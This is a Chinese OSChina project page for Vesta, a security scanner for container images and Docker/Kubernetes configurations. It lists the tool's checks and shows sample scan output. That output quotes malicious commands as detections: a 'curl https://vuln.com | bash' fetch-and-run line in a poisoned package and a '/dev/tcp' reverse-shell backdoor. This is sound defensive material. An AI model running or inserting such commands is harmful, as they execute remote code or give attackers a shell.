维斯塔 正在参加 2021 年度 OSC 中国开源项目评选,请投票支持!
维斯塔 在 2021 年度 OSC 中国开源项目评选 中已获得 {{ projectVoteCount }} 票,请投票支持!
2021 年度 OSC 中国开源项目评选 正在火热进行中,快来投票支持你喜欢的开源项目!
2021 年度 OSC 中国开源项目评选 >>> 中场回顾
维斯塔 获得 2021 年度 OSC 中国开源项目评选「最佳人气项目」 !
授权协议 Apache
开发语言 Google Go
操作系统 跨平台
软件类型 开源软件
所属分类 云计算云原生
开源组织
地区 国产
投 递 者 christa
适用人群 未知
收录时间 2022-12-29

软件简介

vesta 是一款集容器扫描,Docker和Kubernetes配置基线检查于一身的工具。检查内容包括镜像或容器中包含漏洞版本的组件,Docker以及Kubernetes的危险配置。vesta同时也是一个灵活,方便的工具,能够在各种系统上运行,机器内1 vCPU, 2G Memory即可,包括但不限于Windows,Linux以及MacOS

检查项

Scan

  • 扫描通过主流安装方法安装程序的漏洞
    • apt/apt-get
    • rpm
    • yum
    • dpkg
  • 扫描软件依赖的漏洞以及恶意投毒的依赖包
    • Java(Jar, War, 以及主流依赖log4j)
    • NodeJs(NPM, YARN)
    • Python(Wheel, Poetry)
    • Golang(Go binary)
    • PHP(Composer, 以及主流的PHP框架: laravel, thinkphp, wordpress, wordpress插件等)
    • Rust(Rust binary)

Docker检查

Supported Check Item Description Severity Reference
PrivilegeAllowed 危险的特权模式 critical Ref
Capabilities 危险capabilities被设置 critical Ref
Volume Mount 敏感或危险目录被挂载 critical Ref
Docker Unauthorized 2375端口打开并且未授权 critical Ref
Kernel version 当前内核版本存在逃逸漏洞 critical Ref
Network Module Net模式为host模式或同时在特定containerd版本下 critical/medium  
Pid Module Pid模式被设置为host high  
Docker Server version Docker Server版本存在漏洞 critical/high/medium/low  
Docker env password check Docker env是否存在弱密码 high/medium  
Image tag check Image没有被打tag或为默认latest low  
Docker history Docker layers 存在不安全的命令 high/medium  
Docker Backdoor Docker env command 存在恶意命令 critical/high  

Kubernetes检查

Supported Check Item Description Severity Reference
PrivilegeAllowed 危险的特权模式 critical Ref
Capabilities 危险capabilities被设置 critical Ref
PV and PVC PV 被挂载到敏感目录并且状态为active critical/medium Ref
RBAC K8s 权限存在危险配置 high/medium/ low/warning  
Kubernetes-dashborad 检查 -enable-skip-login以及 dashborad的账户权限 critical/high/ low Ref
Kernel version 当前内核版本存在逃逸漏洞 critical Ref
Docker Server version (k8s versions is less than v1.24) Docker Server版本存在漏洞 critical/high/ medium/low  
Kubernetes certification expiration 证书到期时间小于30天 medium  
ConfigMap and Secret check ConfigMap 或者 Secret是否存在弱密码 high/medium  
PodSecurityPolicy check (k8s version under the v1.25) PodSecurityPolicy过度容忍Pod不安全配置 high/medium/low Ref
Auto Mount ServiceAccount Token Pod默认挂载了service token critical/high/ medium/low Ref
NoResourceLimits 没有限制资源的使用,例如CPU,Memory, 存储 low Ref
Job and Cronjob Job或CronJob没有设置seccomp或seLinux安全策略 low Ref
Envoy admin Envoy admin被配置以及监听0.0.0.0. high/medium Ref
Cilium version Cilium 存在漏洞版本 critical/high/ medium/low Ref
Istio configurations Istio 存在漏洞版本以及安全配置检查 critical/high/ medium/low Ref
Kubelet 10255 and Kubectl proxy 10255 port 打开或 Kubectl proxy开启 high/medium/ low  
Etcd configuration Etcd 安全配置检查 high/medium  
Sidecar configurations Sidecar 安全配置检查以及Env环境检查 critical/high/ medium/low  
Pod annotation Pod annotation 存在不安全配置 high/medium/ low/warning Ref
DaemonSet DaemonSet存在不安全配置 critical/high/ medium/low  
Backdoor 检查k8s中是否有后门 critical/high Ref
Lateral admin movement Pod被特意配置到Master节点中 medium/low  

编译并使用vesta

  1. 编译vesta
  • 使用make build 进行编译
  • Releases上下载可执行文件
  1. 使用vesta检查镜像过容器中的漏洞组件版本(使用镜像ID,镜像标签或使用-f文件输入均可)
$./vesta scan container -f example.tar

2022/11/29 22:50:19 Begin upgrading vulnerability database
2022/11/29 22:50:19 Vulnerability Database is already initialized
2022/11/29 22:50:19 Begin to analyze the layer
2022/11/29 22:50:35 Begin to scan the layer

Detected 216 vulnerabilities

+-----+--------------------+-----------------+------------------+-------+----------+------------------------------------------------------------------+
| 208 | python3.6 - Django | 2.2.3           | CVE-2019-14232   |   7.5 | high     | An issue was discovered                                          |
|     |                    |                 |                  |       |          | in Django 1.11.x before                                          |
|     |                    |                 |                  |       |          | 1.11.23, 2.1.x before 2.1.11,                                    |
|     |                    |                 |                  |       |          | and 2.2.x before 2.2.4. If                                       |
|     |                    |                 |                  |       |          | django.utils.text.Truncator's                                    |
|     |                    |                 |                  |       |          | chars() and words() methods                                      |
|     |                    |                 |                  |       |          | were passed the html=True                                        |
|     |                    |                 |                  |       |          | argument, t ...                                                  |
+-----+                    +-----------------+------------------+-------+----------+------------------------------------------------------------------+
| 209 |                    | 2.2.3           | CVE-2019-14233   |   7.5 | high     | An issue was discovered                                          |
|     |                    |                 |                  |       |          | in Django 1.11.x before                                          |
|     |                    |                 |                  |       |          | 1.11.23, 2.1.x before 2.1.11,                                    |
|     |                    |                 |                  |       |          | and 2.2.x before 2.2.4.                                          |
|     |                    |                 |                  |       |          | Due to the behaviour of                                          |
|     |                    |                 |                  |       |          | the underlying HTMLParser,                                       |
|     |                    |                 |                  |       |          | django.utils.html.strip_tags                                     |
|     |                    |                 |                  |       |          | would be extremely ...                                           |
+-----+                    +-----------------+------------------+-------+----------+------------------------------------------------------------------+
| 210 |                    | 2.2.3           | CVE-2019-14234   |   9.8 | critical | An issue was discovered in                                       |
|     |                    |                 |                  |       |          | Django 1.11.x before 1.11.23,                                    |
|     |                    |                 |                  |       |          | 2.1.x before 2.1.11, and 2.2.x                                   |
|     |                    |                 |                  |       |          | before 2.2.4. Due to an error                                    |
|     |                    |                 |                  |       |          | in shallow key transformation,                                   |
|     |                    |                 |                  |       |          | key and index lookups for                                        |
|     |                    |                 |                  |       |          | django.contrib.postgres.f ...                                    |
+-----+--------------------+-----------------+------------------+-------+----------+------------------------------------------------------------------+
| 211 | python3.6 - numpy  | 1.24.2          |                  |   8.5 | high     | Malicious package is detected in                                 |
|     |                    |                 |                  |       |          | '/usr/local/lib/python3.6/site-packages/numpy/setup.py',         |
|     |                    |                 |                  |       |          | malicious command "curl https://vuln.com | bash" are             |
|     |                    |                 |                  |       |          | detected.                                                        |
+-----+--------------------+-----------------+------------------+-------+----------+------------------------------------------------------------------+
 
  1. 使用vesta检查Docker的基线配置

也可以在docker中使用

make run.docker
 
$./vesta analyze docker

2022/11/29 23:06:32 Start analysing

Detected 3 vulnerabilities

+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+
| ID |      CONTAINER DETAIL      |     PARAM      |             VALUE              | SEVERITY |          DESCRIPTION           |
+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+
|  1 | Name: Kernel               | kernel version | 5.10.104-linuxkit              | critical | Kernel version is suffering    |
|    | ID: None                   |                |                                |          | the CVE-2022-0492 with         |
|    |                            |                |                                |          | CAP_SYS_ADMIN and v1           |
|    |                            |                |                                |          | architecture of cgroups        |
|    |                            |                |                                |          | vulnerablility, has a          |
|    |                            |                |                                |          | potential container escape.    |
+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+
|  2 | Name: vesta_vuln_test      | kernel version | 5.10.104-linuxkit              | critical | Kernel version is suffering    |
|    | ID: 207cf8842b15           |                |                                |          | the Dirty Pipe vulnerablility, |
|    |                            |                |                                |          | has a potential container      |
|    |                            |                |                                |          | escape.                        |
+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+
|  3 | Name: Image Tag            | Privileged     | true                           | critical | There has a potential container|
|    | ID: None                   |                |                                |          | escape in privileged  module.  |
|    |                            |                |                                |          |                                |
+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+
|  4 | Name: Image Configuration  | Image History  | Image name:                    | high     | Weak password found            |
|    | ID: None                   |                | vesta_history_test:latest |    |          | in command: ' echo             |
|    |                            |                | Image ID: 4bc05e1e3881         |          | 'password=test123456' >        |
|    |                            |                |                                |          | config.ini # buildkit'.        |
+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+
 
  1. 使用vesta检查Kubernetes的基线配置
2022/11/29 23:15:59 Start analysing
2022/11/29 23:15:59 Geting docker server version
2022/11/29 23:15:59 Geting kernel version

Detected 4 vulnerabilities

Pods:
+----+--------------------------------+--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
| ID |           POD DETAIL           |             PARAM              |             VALUE              |         TYPE          | SEVERITY |          DESCRIPTION           |
+----+--------------------------------+--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
|  1 | Name: vulntest | Namespace:    | sidecar name: vulntest |       | true                           | Pod                   | critical | There has a potential          |
|    | default | Status: Running |    | Privileged                     |                                |                       |          | container escape in privileged |
|    | Node Name: docker-desktop      |                                |                                |                       |          | module.                        |
+    +                                +--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
|    |                                | sidecar name: vulntest |       | Token:Password123456           | Sidecar EnvFrom       | high     | Sidecar envFrom ConfigMap has  |
|    |                                | env                            |                                |                       |          | found weak password:           |
|    |                                |                                |                                |                       |          | 'Password123456'.              |
+    +                                +--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
|    |                                | sidecar name: sidecartest |    | MALWARE: bash -i >&            | Sidecar Env           | high     | Container 'sidecartest' finds  |
|    |                                | env                            | /dev/tcp/10.0.0.1/8080 0>&1    |                       |          | high risk content(score:       |
|    |                                |                                |                                |                       |          | 0.91 out of 1.0), which is a   |
|    |                                |                                |                                |                       |          | suspect command backdoor.      |
+----+--------------------------------+--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
|  2 | Name: vulntest2 | Namespace:   | sidecar name: vulntest2 |      | CAP_SYS_ADMIN                  | capabilities.add      | critical | There has a potential          |
|    | default | Status: Running |    | capabilities                   |                                |                       |          | container escape in privileged |
|    | Node Name: docker-desktop      |                                |                                |                       |          | module.                        |
+    +                                +--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
|    |                                | sidecar name: vulntest2 |      | true                           | kube-api-access-lcvh8 | critical | Mount service account          |
|    |                                | automountServiceAccountToken   |                                |                       |          | and key permission are         |
|    |                                |                                |                                |                       |          | given, which will cause a      |
|    |                                |                                |                                |                       |          | potential container escape.    |
|    |                                |                                |                                |                       |          | Reference clsuterRolebind:     |
|    |                                |                                |                                |                       |          | vuln-clusterrolebinding |      |
|    |                                |                                |                                |                       |          | roleBinding: vuln-rolebinding  |
+    +                                +--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
|    |                                | sidecar name: vulntest2 |      | cpu                            | Pod                   | low      | CPU usage is not limited.      |
|    |                                | Resource                       |                                |                       |          |                                |
|    |                                |                                |                                |                       |          |                                |
+----+--------------------------------+--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+

Configures:
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
| ID |            TYPEL            |             PARAM              |                         VALUE                          | SEVERITY |          DESCRIPTION           |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
|  1 | K8s version less than v1.24 | kernel version                 | 5.10.104-linuxkit                                      | critical | Kernel version is suffering    |
|    |                             |                                |                                                        |          | the CVE-2022-0185 with         |
|    |                             |                                |                                                        |          | CAP_SYS_ADMIN vulnerablility,  |
|    |                             |                                |                                                        |          | has a potential container      |
|    |                             |                                |                                                        |          | escape.                        |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
|  2 | ConfigMap                   | ConfigMap Name: vulnconfig     | db.string:mysql+pymysql://dbapp:Password123@db:3306/db | high     | ConfigMap has found weak       |
|    |                             | Namespace: default             |                                                        |          | password: 'Password123'.       |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
|  3 | Secret                      | Secret Name: vulnsecret-auth   | password:Password123                                   | high     | Secret has found weak          |
|    |                             | Namespace: default             |                                                        |          | password: 'Password123'.       |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
|  4 | ClusterRoleBinding          | binding name:                  | verbs: get, watch, list,                               | high     | Key permissions with key       |
|    |                             | vuln-clusterrolebinding |      | create, update | resources:                            |          | resources given to the         |
|    |                             | rolename: vuln-clusterrole |   | pods, services                                         |          | default service account, which |
|    |                             | kind: ClusterRole | subject    |                                                        |          | will cause a potential data    |
|    |                             | kind: Group | subject name:    |                                                        |          | leakage.                       |
|    |                             | system:serviceaccounts:vuln |  |                                                        |          |                                |
|    |                             | namespace: vuln                |                                                        |          |                                |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
|  5 | RoleBinding                 | binding name: vuln-rolebinding | verbs: get, watch, list,                               | high     | Key permissions with key       |
|    |                             | | rolename: vuln-role | role   | create, update | resources:                            |          | resources given to the         |
|    |                             | kind: Role | subject kind:     | pods, services                                         |          | default service account, which |
|    |                             | ServiceAccount | subject name: |                                                        |          | will cause a potential data    |
|    |                             | default | namespace: default   |                                                        |          | leakage.                       |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
|  6 | ClusterRoleBinding          | binding name:                  | verbs: get, watch, list,                               | warning  | Key permission are given       |
|    |                             | vuln-clusterrolebinding2 |     | create, update | resources:                            |          | to unknown user 'testUser',    |
|    |                             | rolename: vuln-clusterrole |   | pods, services                                         |          | printing it for checking.      |
|    |                             | subject kind: User | subject   |                                                        |          |                                |
|    |                             | name: testUser | namespace:    |                                                        |          |                                |
|    |                             | all                            |                                                        |          |                                |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
 

使用方法

$./vesta -h
Vesta is a static analysis of vulnerabilities, Docker and Kubernetes configuration detect toolkit
               Tutorial is available at https://github.com/kvesta/vesta

Usage:
  vesta [command]

Available Commands:
  analyze     Kubernetes analyze
  completion  Generate the autocompletion script for the specified shell
  help        Help about any command
  scan        Container scan
  update      Update vulnerability database
  version     Print version information and quit

Flags:
  -h, --help   help for vesta
 
展开阅读全文

代码

的 Gitee 指数为
超过 的项目

评论

点击加入讨论🔥(1) 发布并加入讨论🔥
发表了资讯
2023/05/08 10:53

Vesta v1.0.7 云原生安全检测工具发布:增加云原生后门检测

Vesta 是一款高效、方便的容器扫描以及 Docker、Kubernetes 基线安全检查工具。 致力检查因 Docker 或 Kubernetes 错误配置以及镜像软件安全问题而导致的各种潜在危害的发生。 Vesta v1.0.7 更新内容如下: 新功能 增加漏洞源OSCS作为Python和Node投毒包检测 增加部分 Docker 安全配置检测规则 包括增加windows的危险挂载路径检测,Docker 镜像layer的危险命令检测 增加node安全权限检测 对于攻击中通过尝试将Pod所在的node节点从...

0
2
发表了资讯
2023/02/27 14:18

Vesta v1.0.5 云原生安全检测工具发布:增加大量 Python 模块的安全检测

Vesta 是一款高效、方便的容器扫描以及 Docker、Kubernetes 基线安全检查工具。 致力检查因 Docker 或 Kubernetes 错误配置以及镜像软件安全问题而导致的各种潜在危害的发生。 Vesta v1.0.5 更新内容如下: 新功能 增加Python poetry包管理安装包检测以及Python venv虚拟环境包检测 增加部分Docker安全配置检测规则 改进 将下载漏洞库的最低年份从2002年提高到2010年,检测初始化下载所消耗的时间 Docker History命令检查增加对$...

0
2
发表了资讯
2023/02/06 23:27

Vesta v1.04 云原生安全检测工具发布:增加供应链投毒检测

Vesta 是一款实用、方便的镜像扫描以及 Docker、Kubernetes 基线安全检查工具。 致力检查因 Docker 或 Kubernetes 错误配置而导致的各种潜在安全问题的发生。 Vesta v1.0.4 更新内容如下: 新功能 增加sidecar中Env以及EnvFrom中变量检查,并且定位到具体的ConfigMap或Secret 增加Pod annotation检测 增加供应链投毒检测 改进 更改了的rpm检测的方法 更改了containerd内核检测方法 upgrade命令更换为update vesta 收集了网上用量...

0
2
发表了资讯
2023/01/15 17:08

Vesta v1.0.3 云原生安全检测工具 发布:增加大量RBAC检测规则

Vesta 是一款实用、方便的镜像扫描以及 Docker、Kubernetes 基线安全检查工具。 致力检查因 Docker 或 Kubernetes 错误配置而导致的各种潜在安全问题的发生。 Vesta v1.0.3 更新内容如下: 新功能 镜像检查增加对Java,PHP,Rust依赖的版本检查支持 增加istio的检查,包括istio版本检查,以及istio header请求过度敏感信息检查,参考issue 增加Docker history命令行检查,检查是否存在echo 弱密码的命令出现 改进 npm检查方法改进...

0
5
发表了资讯
2023/01/02 01:21

Vesta v1.0.2 发布,一款实用的云原生基线安全检查工具

Vesta是一款实用、方便的镜像扫描以及Docker、Kubernetes基线安全检查工具。 致力检查因为Docker或Kubernetes错误配置而导致的各种潜在安全问题的发生。 Vesta v1.0.2更新内容如下: 新功能 增加cilium版本漏洞检测 增加kubelet read-only-port参数以及kubectl proxy的错误使用的检测 增加etcd安全配置的检测 增加RoleBinding安全配置的检测 镜像扫描增加go二进制检测 改进 优化Layers整合的方法,镜像扫描速度加快 目前vesta支持...

0
1
没有更多内容
加载失败,请刷新页面
点击加载更多
加载中
下一页
发表了博客
{{o.pubDate | formatDate}}

{{formatAllHtml(o.title)}}

{{parseInt(o.replyCount) | bigNumberTransform}}
{{parseInt(o.viewCount) | bigNumberTransform}}
没有更多内容
暂无内容
发表了问答
{{o.pubDate | formatDate}}

{{formatAllHtml(o.title)}}

{{parseInt(o.replyCount) | bigNumberTransform}}
{{parseInt(o.viewCount) | bigNumberTransform}}
没有更多内容
暂无内容
暂无内容
1 评论
9 收藏
分享
OSCHINA
登录后可查看更多优质内容
返回顶部
顶部